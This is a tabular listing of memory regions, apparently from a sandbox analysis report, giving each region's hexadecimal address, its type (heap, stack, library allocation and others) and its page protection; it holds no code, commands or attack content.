1D99EF22000
|
heap
|
page read and write
|
||
1E9E2140000
|
heap
|
page read and write
|
||
1D99EA61000
|
heap
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
51AE000
|
trusted library allocation
|
page read and write
|
||
24E98184000
|
heap
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
1DA7D328000
|
heap
|
page read and write
|
||
22234676000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1AC8E617000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
34C9000
|
trusted library allocation
|
page read and write
|
||
1AC8E5E4000
|
trusted library allocation
|
page read and write
|
||
201AB120000
|
heap
|
page readonly
|
||
207DD8D0000
|
trusted library allocation
|
page read and write
|
||
207DE3D5000
|
heap
|
page read and write
|
||
FA0000
|
trusted library allocation
|
page read and write
|
||
1D99E899000
|
heap
|
page read and write
|
||
9CA9A4E000
|
stack
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
54A4000
|
trusted library allocation
|
page read and write
|
||
107F000
|
heap
|
page read and write
|
||
207DE37A000
|
heap
|
page read and write
|
||
541000
|
stack
|
page read and write
|
||
1E9E20CD000
|
heap
|
page read and write
|
||
5383000
|
trusted library allocation
|
page read and write
|
||
1AC8CA63000
|
heap
|
page read and write
|
||
7FF848B04000
|
trusted library allocation
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
204A9FE000
|
stack
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
7FF848CB2000
|
trusted library allocation
|
page read and write
|
||
4F454FE000
|
stack
|
page read and write
|
||
1C805000
|
heap
|
page read and write
|
||
2003E2A2000
|
heap
|
page read and write
|
||
F7EA3FC000
|
stack
|
page read and write
|
||
1D99E893000
|
heap
|
page read and write
|
||
2853000
|
trusted library allocation
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
C9C000
|
heap
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1D99EE86000
|
heap
|
page read and write
|
||
548A000
|
trusted library allocation
|
page read and write
|
||
539E000
|
trusted library allocation
|
page read and write
|
||
22234570000
|
heap
|
page read and write
|
||
1245000
|
heap
|
page read and write
|
||
284E000
|
stack
|
page read and write
|
||
1D99E852000
|
heap
|
page read and write
|
||
12A41000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
201AE904000
|
trusted library allocation
|
page read and write
|
||
207DCFA3000
|
heap
|
page read and write
|
||
1E9E20C4000
|
heap
|
page read and write
|
||
207DE349000
|
heap
|
page read and write
|
||
207DCC50000
|
trusted library allocation
|
page read and write
|
||
7FF848CD8000
|
trusted library allocation
|
page read and write
|
||
1DA7D468000
|
heap
|
page read and write
|
||
207DD620000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
201AD989000
|
trusted library allocation
|
page read and write
|
||
207DCE02000
|
heap
|
page read and write
|
||
2EF887E000
|
unkown
|
page readonly
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
22234682000
|
heap
|
page read and write
|
||
496C000
|
trusted library allocation
|
page read and write
|
||
207D31BE000
|
heap
|
page read and write
|
||
201AAFF2000
|
heap
|
page read and write
|
||
5B6E538000
|
stack
|
page read and write
|
||
207DC540000
|
trusted library allocation
|
page read and write
|
||
1D99EEEE000
|
heap
|
page read and write
|
||
201BCB01000
|
trusted library allocation
|
page read and write
|
||
207DD475000
|
heap
|
page read and write
|
||
247BF430000
|
trusted library allocation
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
C4BECF5000
|
stack
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
1D63B000
|
heap
|
page read and write
|
||
5300000
|
trusted library allocation
|
page read and write
|
||
1B960000
|
heap
|
page execute and read and write
|
||
207DE31D000
|
heap
|
page read and write
|
||
1C972841000
|
trusted library allocation
|
page read and write
|
||
7DF462760000
|
trusted library allocation
|
page execute and read and write
|
||
1C398000
|
heap
|
page read and write
|
||
1D99E9F4000
|
heap
|
page read and write
|
||
134F000
|
stack
|
page read and write
|
||
1E9E42B3000
|
heap
|
page read and write
|
||
207DE7DC000
|
heap
|
page read and write
|
||
7DF4914B0000
|
trusted library allocation
|
page execute and read and write
|
||
2BF9D0B0000
|
trusted library allocation
|
page read and write
|
||
207E0100000
|
heap
|
page read and write
|
||
207DDFC0000
|
unkown
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1DA63280000
|
heap
|
page read and write
|
||
1E9E4272000
|
heap
|
page read and write
|
||
1D99EA28000
|
heap
|
page read and write
|
||
2BF9D114000
|
heap
|
page read and write
|
||
F00000
|
trusted library allocation
|
page read and write
|
||
D07AE47000
|
stack
|
page read and write
|
||
CEB000
|
heap
|
page read and write
|
||
F7ED1FD000
|
stack
|
page read and write
|
||
1AC8E540000
|
heap
|
page read and write
|
||
247BF46A000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
F80000
|
trusted library allocation
|
page read and write
|
||
20026DAE000
|
trusted library allocation
|
page read and write
|
||
1D99EEA8000
|
heap
|
page read and write
|
||
1D99EA15000
|
heap
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
11C0000
|
trusted library allocation
|
page read and write
|
||
222345E6000
|
heap
|
page read and write
|
||
207D0D13000
|
heap
|
page read and write
|
||
207DE013000
|
heap
|
page read and write
|
||
207DDD29000
|
heap
|
page read and write
|
||
7FF848C40000
|
trusted library allocation
|
page execute and read and write
|
||
2223461A000
|
heap
|
page read and write
|
||
9C6F2FD000
|
stack
|
page read and write
|
||
201AD87A000
|
trusted library allocation
|
page read and write
|
||
1D52F000
|
stack
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
1D99F062000
|
heap
|
page read and write
|
||
14635861000
|
heap
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
207DEE24000
|
heap
|
page read and write
|
||
201ACAF0000
|
heap
|
page read and write
|
||
207E0044000
|
heap
|
page read and write
|
||
2EF877E000
|
unkown
|
page readonly
|
||
1AC8CB60000
|
trusted library allocation
|
page read and write
|
||
1D99EE74000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
7FF848CAA000
|
trusted library allocation
|
page read and write
|
||
204B54E000
|
stack
|
page read and write
|
||
207DE600000
|
heap
|
page read and write
|
||
2BF9CF32000
|
heap
|
page read and write
|
||
201BCB10000
|
trusted library allocation
|
page read and write
|
||
204A4FE000
|
stack
|
page read and write
|
||
1D99E9E5000
|
heap
|
page read and write
|
||
207DEEF5000
|
heap
|
page read and write
|
||
1D99F013000
|
heap
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
2550000
|
heap
|
page read and write
|
||
1D99F092000
|
heap
|
page read and write
|
||
4DD3000
|
trusted library allocation
|
page read and write
|
||
207DDD91000
|
heap
|
page read and write
|
||
1D99E893000
|
heap
|
page read and write
|
||
1D99E9C2000
|
heap
|
page read and write
|
||
247BD8FB000
|
heap
|
page read and write
|
||
207DC320000
|
heap
|
page readonly
|
||
7FF848B6C000
|
trusted library allocation
|
page execute and read and write
|
||
222345FC000
|
heap
|
page read and write
|
||
1AC8E669000
|
trusted library allocation
|
page read and write
|
||
207DD8A4000
|
unkown
|
page readonly
|
||
207DC6EA000
|
unkown
|
page readonly
|
||
207DE334000
|
heap
|
page read and write
|
||
7FF848CD2000
|
trusted library allocation
|
page read and write
|
||
7FF848B4D000
|
trusted library allocation
|
page execute and read and write
|
||
D142AFF000
|
unkown
|
page read and write
|
||
1D99E7C4000
|
heap
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page read and write
|
||
207D5D7E000
|
heap
|
page read and write
|
||
7FF848AF2000
|
trusted library allocation
|
page read and write
|
||
207DC310000
|
trusted library allocation
|
page read and write
|
||
207DC9C0000
|
trusted library allocation
|
page read and write
|
||
1D99F0A4000
|
heap
|
page read and write
|
||
207DCCA0000
|
trusted library allocation
|
page read and write
|
||
1AC8CA2C000
|
heap
|
page read and write
|
||
4F452FE000
|
stack
|
page read and write
|
||
1D99E9B1000
|
heap
|
page read and write
|
||
F7EBFFC000
|
stack
|
page read and write
|
||
5265000
|
trusted library allocation
|
page read and write
|
||
1C975C40000
|
trusted library allocation
|
page read and write
|
||
207DC68A000
|
unkown
|
page readonly
|
||
7FF848E8C000
|
trusted library allocation
|
page read and write
|
||
7FF848E44000
|
trusted library allocation
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
FB5000
|
heap
|
page read and write
|
||
1DA65A03000
|
trusted library allocation
|
page read and write
|
||
1C97251D000
|
heap
|
page read and write
|
||
200245E4000
|
heap
|
page read and write
|
||
207DD7A6000
|
unkown
|
page readonly
|
||
207E04D2000
|
heap
|
page read and write
|
||
F7EB6FC000
|
stack
|
page read and write
|
||
24E98180000
|
heap
|
page read and write
|
||
FA5000
|
heap
|
page read and write
|
||
7FF848B7C000
|
trusted library allocation
|
page execute and read and write
|
||
201C4B01000
|
heap
|
page read and write
|
||
D07A27C000
|
stack
|
page read and write
|
||
1D99EF10000
|
heap
|
page read and write
|
||
7FF848C50000
|
trusted library allocation
|
page execute and read and write
|
||
20035F31000
|
trusted library allocation
|
page read and write
|
||
2003E734000
|
heap
|
page read and write
|
||
20026CA1000
|
trusted library allocation
|
page read and write
|
||
201AAE60000
|
heap
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page execute and read and write
|
||
207DC6AE000
|
unkown
|
page readonly
|
||
146358F9000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
1D99EA5D000
|
heap
|
page read and write
|
||
1E9E20C4000
|
heap
|
page read and write
|
||
207DE299000
|
heap
|
page read and write
|
||
204B7CE000
|
stack
|
page read and write
|
||
2002723A000
|
trusted library allocation
|
page read and write
|
||
207DD768000
|
unkown
|
page read and write
|
||
9C6F3FC000
|
stack
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
7FF848F76000
|
trusted library allocation
|
page read and write
|
||
5B6E73E000
|
stack
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
9CA88F7000
|
stack
|
page read and write
|
||
2EF9EFE000
|
stack
|
page read and write
|
||
20027107000
|
trusted library allocation
|
page read and write
|
||
207DE1FC000
|
heap
|
page read and write
|
||
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
1D463D35000
|
heap
|
page read and write
|
||
1D99E9D4000
|
heap
|
page read and write
|
||
2223461A000
|
heap
|
page read and write
|
||
533E000
|
trusted library allocation
|
page read and write
|
||
FB6000
|
heap
|
page read and write
|
||
52E1000
|
trusted library allocation
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF6373D8000
|
unkown
|
page readonly
|
||
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E83D000
|
heap
|
page read and write
|
||
1D467721000
|
trusted library allocation
|
page read and write
|
||
204A978000
|
stack
|
page read and write
|
||
24E97F9B000
|
heap
|
page read and write
|
||
530C000
|
trusted library allocation
|
page read and write
|
||
1463581F000
|
heap
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
201AB110000
|
trusted library allocation
|
page read and write
|
||
210D3C20000
|
heap
|
page read and write
|
||
207DD51D000
|
heap
|
page read and write
|
||
1D99F062000
|
heap
|
page read and write
|
||
146358D6000
|
heap
|
page read and write
|
||
1AC8CB20000
|
heap
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848CB4000
|
trusted library allocation
|
page read and write
|
||
2BFB7514000
|
heap
|
page read and write
|
||
1D99F075000
|
heap
|
page read and write
|
||
126A3000
|
trusted library allocation
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
1C972535000
|
heap
|
page read and write
|
||
1ACA6C95000
|
heap
|
page read and write
|
||
1D467236000
|
trusted library allocation
|
page read and write
|
||
210D3C43000
|
heap
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
2E1C000
|
trusted library allocation
|
page read and write
|
||
7FF848B44000
|
trusted library allocation
|
page read and write
|
||
20026FBF000
|
trusted library allocation
|
page read and write
|
||
9C6F4FE000
|
stack
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
247BDB00000
|
heap
|
page execute and read and write
|
||
1D99EA27000
|
heap
|
page read and write
|
||
207DEFB1000
|
heap
|
page read and write
|
||
1C972420000
|
heap
|
page readonly
|
||
A18000
|
heap
|
page read and write
|
||
2223467E000
|
heap
|
page read and write
|
||
1DA7D540000
|
trusted library allocation
|
page read and write
|
||
207E020E000
|
heap
|
page read and write
|
||
1DA63310000
|
trusted library allocation
|
page read and write
|
||
1E9E4273000
|
heap
|
page read and write
|
||
D079CFE000
|
stack
|
page read and write
|
||
207DCF02000
|
heap
|
page read and write
|
||
1D47DF1B000
|
heap
|
page read and write
|
||
1D32B000
|
stack
|
page read and write
|
||
1E9E21B4000
|
heap
|
page read and write
|
||
13062000
|
trusted library allocation
|
page read and write
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
1E9E5740000
|
trusted library allocation
|
page read and write
|
||
1D99EA85000
|
heap
|
page read and write
|
||
1DA650ED000
|
trusted library allocation
|
page read and write
|
||
204A5FA000
|
stack
|
page read and write
|
||
C98000
|
heap
|
page read and write
|
||
4D42000
|
trusted library allocation
|
page read and write
|
||
207E000E000
|
heap
|
page read and write
|
||
207DEFCA000
|
heap
|
page read and write
|
||
D07A37B000
|
stack
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
207E0002000
|
heap
|
page read and write
|
||
207DC630000
|
trusted library allocation
|
page read and write
|
||
1D99E991000
|
heap
|
page read and write
|
||
21EFCFD000
|
stack
|
page read and write
|
||
1D99EA17000
|
heap
|
page read and write
|
||
207DDAC0000
|
heap
|
page read and write
|
||
1B40E000
|
stack
|
page read and write
|
||
207DDF80000
|
remote allocation
|
page read and write
|
||
7FF848CC2000
|
trusted library allocation
|
page read and write
|
||
7DF4AA8B0000
|
trusted library allocation
|
page execute and read and write
|
||
146302B5000
|
heap
|
page read and write
|
||
20025EF0000
|
heap
|
page execute and read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
207E0284000
|
heap
|
page read and write
|
||
5294000
|
trusted library allocation
|
page read and write
|
||
D079FFE000
|
stack
|
page read and write
|
||
207DE0E4000
|
heap
|
page read and write
|
||
7FF848E64000
|
trusted library allocation
|
page read and write
|
||
207DE351000
|
heap
|
page read and write
|
||
1D99EAF4000
|
heap
|
page read and write
|
||
207DEE13000
|
heap
|
page read and write
|
||
52F8000
|
trusted library allocation
|
page read and write
|
||
207D0D35000
|
heap
|
page read and write
|
||
201ADB04000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
207DCAC3000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
14635842000
|
heap
|
page read and write
|
||
247BD870000
|
heap
|
page read and write
|
||
207DD63E000
|
unkown
|
page readonly
|
||
5D5000
|
heap
|
page read and write
|
||
204A7F9000
|
stack
|
page read and write
|
||
7FF848B23000
|
trusted library allocation
|
page execute and read and write
|
||
D079C7E000
|
stack
|
page read and write
|
||
1ACA6C10000
|
heap
|
page read and write
|
||
495B000
|
trusted library allocation
|
page read and write
|
||
1DA63220000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
F7EA8FC000
|
stack
|
page read and write
|
||
207E0303000
|
heap
|
page read and write
|
||
20024200000
|
heap
|
page read and write
|
||
1463022B000
|
heap
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page execute and read and write
|
||
207D0BC0000
|
heap
|
page read and write
|
||
207DD67E000
|
unkown
|
page readonly
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B0B000
|
trusted library allocation
|
page read and write
|
||
1DC72000
|
direct allocation
|
page read and write
|
||
200272EF000
|
trusted library allocation
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
1D99E7DE000
|
heap
|
page read and write
|
||
1D99E7E8000
|
heap
|
page read and write
|
||
1B4C0000
|
trusted library section
|
page read and write
|
||
1D99E9F5000
|
heap
|
page read and write
|
||
1DA662C2000
|
trusted library allocation
|
page read and write
|
||
7FF848CF2000
|
trusted library allocation
|
page read and write
|
||
20036213000
|
trusted library allocation
|
page read and write
|
||
981EAFF000
|
stack
|
page read and write
|
||
207DE3DD000
|
heap
|
page read and write
|
||
14630295000
|
heap
|
page read and write
|
||
201AE285000
|
trusted library allocation
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
1D99E88F000
|
heap
|
page read and write
|
||
207E00A6000
|
heap
|
page read and write
|
||
7FF848D0F000
|
trusted library allocation
|
page read and write
|
||
201ADC26000
|
trusted library allocation
|
page read and write
|
||
1D99E7CF000
|
heap
|
page read and write
|
||
7FF637390000
|
unkown
|
page readonly
|
||
ECF000
|
stack
|
page read and write
|
||
52E8000
|
trusted library allocation
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
2EF8C7E000
|
unkown
|
page readonly
|
||
24E981B0000
|
heap
|
page read and write
|
||
5B6E63E000
|
stack
|
page read and write
|
||
14635884000
|
heap
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
207DCDC0000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
207DDD8E000
|
heap
|
page read and write
|
||
14630B1A000
|
heap
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
7FF848C06000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E9A2000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
F7E97FE000
|
stack
|
page read and write
|
||
7FF848CCA000
|
trusted library allocation
|
page read and write
|
||
207E0202000
|
heap
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
2EF8F7E000
|
stack
|
page read and write
|
||
207D9EA0000
|
trusted library allocation
|
page read and write
|
||
146357F0000
|
trusted library allocation
|
page read and write
|
||
207D0D62000
|
heap
|
page read and write
|
||
54A6000
|
trusted library allocation
|
page read and write
|
||
207DE3E2000
|
heap
|
page read and write
|
||
1DA7D4C1000
|
heap
|
page read and write
|
||
5367000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
1D99E828000
|
heap
|
page read and write
|
||
207DCDFE000
|
unkown
|
page readonly
|
||
1C972430000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
1D466C4F000
|
trusted library allocation
|
page read and write
|
||
F7EA5FF000
|
stack
|
page read and write
|
||
207DE6FD000
|
heap
|
page read and write
|
||
201AB00E000
|
heap
|
page read and write
|
||
146358FD000
|
heap
|
page read and write
|
||
1E9E41A1000
|
heap
|
page read and write
|
||
207DEF0E000
|
heap
|
page read and write
|
||
2EF817E000
|
unkown
|
page readonly
|
||
1D99E825000
|
heap
|
page read and write
|
||
2002708E000
|
trusted library allocation
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
5B6F38C000
|
stack
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
F90000
|
heap
|
page read and write
|
||
EF0000
|
trusted library allocation
|
page read and write
|
||
247BD850000
|
heap
|
page read and write
|
||
207DD479000
|
heap
|
page read and write
|
||
14630213000
|
heap
|
page read and write
|
||
24E98190000
|
heap
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
BA0000
|
heap
|
page read and write
|
||
1CD30000
|
trusted library section
|
page read and write
|
||
207DCB6F000
|
heap
|
page read and write
|
||
207DD7E0000
|
trusted library allocation
|
page read and write
|
||
1DA64BC6000
|
heap
|
page execute and read and write
|
||
207E0002000
|
heap
|
page read and write
|
||
5399000
|
trusted library allocation
|
page read and write
|
||
2003E500000
|
trusted library allocation
|
page read and write
|
||
20026FEA000
|
trusted library allocation
|
page read and write
|
||
1C97252C000
|
heap
|
page read and write
|
||
F7E96FB000
|
stack
|
page read and write
|
||
7FF848E7C000
|
trusted library allocation
|
page read and write
|
||
146301D0000
|
heap
|
page read and write
|
||
207E0384000
|
heap
|
page read and write
|
||
207DD666000
|
unkown
|
page readonly
|
||
7FF848BA6000
|
trusted library allocation
|
page read and write
|
||
1D94B000
|
stack
|
page read and write
|
||
1D99EA46000
|
heap
|
page read and write
|
||
14630228000
|
heap
|
page read and write
|
||
247BD8D0000
|
heap
|
page read and write
|
||
981E116000
|
stack
|
page read and write
|
||
14635620000
|
trusted library allocation
|
page read and write
|
||
207DF010000
|
heap
|
page read and write
|
||
207DDDD8000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
207D31DA000
|
heap
|
page read and write
|
||
1D99EE86000
|
heap
|
page read and write
|
||
20025C20000
|
trusted library section
|
page read and write
|
||
207D0D25000
|
heap
|
page read and write
|
||
207DC6E0000
|
trusted library allocation
|
page read and write
|
||
207D0D89000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
BAB56EB000
|
stack
|
page read and write
|
||
F7EC5FF000
|
stack
|
page read and write
|
||
207DDC13000
|
heap
|
page read and write
|
||
12AA0000
|
trusted library allocation
|
page read and write
|
||
2003E3F0000
|
heap
|
page read and write
|
||
207DCCEA000
|
unkown
|
page read and write
|
||
207D3186000
|
heap
|
page read and write
|
||
2BF9CED0000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
20027D25000
|
trusted library allocation
|
page read and write
|
||
146358F6000
|
heap
|
page read and write
|
||
146357E0000
|
trusted library allocation
|
page read and write
|
||
1D99E86B000
|
heap
|
page read and write
|
||
7FF848C40000
|
trusted library allocation
|
page execute and read and write
|
||
207D31AC000
|
heap
|
page read and write
|
||
12ADE000
|
trusted library allocation
|
page read and write
|
||
F7ECBFD000
|
stack
|
page read and write
|
||
201C526E000
|
heap
|
page read and write
|
||
14635A50000
|
remote allocation
|
page read and write
|
||
2003E2AA000
|
heap
|
page read and write
|
||
207DCFBD000
|
heap
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page execute and read and write
|
||
1D466D09000
|
trusted library allocation
|
page read and write
|
||
C4BF4FD000
|
stack
|
page read and write
|
||
20026E8D000
|
trusted library allocation
|
page read and write
|
||
2E21000
|
trusted library allocation
|
page read and write
|
||
2003E312000
|
heap
|
page read and write
|
||
207DC64C000
|
unkown
|
page readonly
|
||
146356B0000
|
trusted library allocation
|
page read and write
|
||
1463028E000
|
heap
|
page read and write
|
||
247BF5C1000
|
trusted library allocation
|
page read and write
|
||
201AD871000
|
trusted library allocation
|
page read and write
|
||
1AC8E5FA000
|
trusted library allocation
|
page read and write
|
||
207DEFB8000
|
heap
|
page read and write
|
||
201C5116000
|
heap
|
page execute and read and write
|
||
24E97FB5000
|
heap
|
page read and write
|
||
207DC9C0000
|
trusted library allocation
|
page read and write
|
||
1D463D0D000
|
heap
|
page read and write
|
||
1D466A04000
|
trusted library allocation
|
page read and write
|
||
1AC9E551000
|
trusted library allocation
|
page read and write
|
||
1D99EEEC000
|
heap
|
page read and write
|
||
1AC8CA8C000
|
heap
|
page read and write
|
||
1AC8CBA3000
|
trusted library allocation
|
page read and write
|
||
207E0300000
|
heap
|
page read and write
|
||
CF5000
|
heap
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
5B6E6BE000
|
stack
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
201AB180000
|
heap
|
page read and write
|
||
1AC8CA8E000
|
heap
|
page read and write
|
||
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
1D99E9D4000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
2BF9D080000
|
trusted library allocation
|
page read and write
|
||
1D466392000
|
trusted library allocation
|
page read and write
|
||
1DA7D200000
|
heap
|
page read and write
|
||
207D5C2F000
|
heap
|
page read and write
|
||
207E0400000
|
heap
|
page read and write
|
||
7FF848BC0000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E857000
|
heap
|
page read and write
|
||
201C5272000
|
heap
|
page read and write
|
||
1D99E89C000
|
heap
|
page read and write
|
||
7FF848B4D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
7FF848CF8000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
207DEF9D000
|
heap
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
14630200000
|
heap
|
page read and write
|
||
207D0D5B000
|
heap
|
page read and write
|
||
207DCDE4000
|
unkown
|
page readonly
|
||
204B5CC000
|
stack
|
page read and write
|
||
1E9E2142000
|
heap
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
20025D80000
|
heap
|
page read and write
|
||
207DDC10000
|
heap
|
page read and write
|
||
1DA7D2F0000
|
heap
|
page execute and read and write
|
||
2BFAEB41000
|
trusted library allocation
|
page read and write
|
||
12943000
|
trusted library allocation
|
page read and write
|
||
1D99EFAB000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page execute and read and write
|
||
C7E000
|
heap
|
page read and write
|
||
1D99EF21000
|
heap
|
page read and write
|
||
1D630000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
207E0000000
|
heap
|
page read and write
|
||
146312D0000
|
trusted library section
|
page readonly
|
||
207DD650000
|
trusted library allocation
|
page read and write
|
||
201C5282000
|
heap
|
page read and write
|
||
D07AECD000
|
stack
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
1DA66632000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1DA74F13000
|
trusted library allocation
|
page read and write
|
||
1D99EAF0000
|
heap
|
page read and write
|
||
53A9000
|
trusted library allocation
|
page read and write
|
||
14635800000
|
trusted library allocation
|
page read and write
|
||
7FF848B22000
|
trusted library allocation
|
page read and write
|
||
20035F51000
|
trusted library allocation
|
page read and write
|
||
101D000
|
heap
|
page read and write
|
||
7FF848AFD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D12000
|
trusted library allocation
|
page read and write
|
||
201C54E0000
|
heap
|
page read and write
|
||
207DE769000
|
heap
|
page read and write
|
||
BAB63FE000
|
stack
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
1061000
|
heap
|
page read and write
|
||
207DC690000
|
trusted library allocation
|
page read and write
|
||
1AC8E6D6000
|
trusted library allocation
|
page read and write
|
||
207DC6B0000
|
trusted library allocation
|
page read and write
|
||
1D99EF32000
|
heap
|
page read and write
|
||
1D47DFDD000
|
heap
|
page read and write
|
||
1E9E20C2000
|
heap
|
page read and write
|
||
201ADB95000
|
trusted library allocation
|
page read and write
|
||
BCA000
|
heap
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
D079EFE000
|
stack
|
page read and write
|
||
A1A000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
7FF848B3B000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
1DA7D0C1000
|
heap
|
page read and write
|
||
204AAFE000
|
stack
|
page read and write
|
||
1D463D9B000
|
heap
|
page read and write
|
||
2003E6A8000
|
heap
|
page read and write
|
||
247BDB64000
|
heap
|
page read and write
|
||
1D99E9A3000
|
heap
|
page read and write
|
||
F7EB9FC000
|
stack
|
page read and write
|
||
1DA663A7000
|
trusted library allocation
|
page read and write
|
||
207DC630000
|
trusted library allocation
|
page read and write
|
||
207DD780000
|
trusted library allocation
|
page read and write
|
||
263F000
|
stack
|
page read and write
|
||
207DE57A000
|
unkown
|
page execute read
|
||
20024398000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
F7EACFB000
|
stack
|
page read and write
|
||
1E9E20F9000
|
heap
|
page read and write
|
||
207DC37F000
|
trusted library allocation
|
page read and write
|
||
207DC361000
|
trusted library allocation
|
page read and write
|
||
E84000
|
heap
|
page read and write
|
||
207D5C00000
|
heap
|
page read and write
|
||
1E5FD000
|
heap
|
page read and write
|
||
1D99E87B000
|
heap
|
page read and write
|
||
201C53A3000
|
heap
|
page read and write
|
||
201C5306000
|
heap
|
page read and write
|
||
1AC8E683000
|
trusted library allocation
|
page read and write
|
||
2DB1000
|
trusted library allocation
|
page read and write
|
||
D079E7B000
|
stack
|
page read and write
|
||
207DC6A0000
|
trusted library allocation
|
page read and write
|
||
1C9724E0000
|
heap
|
page read and write
|
||
1DA65FA7000
|
trusted library allocation
|
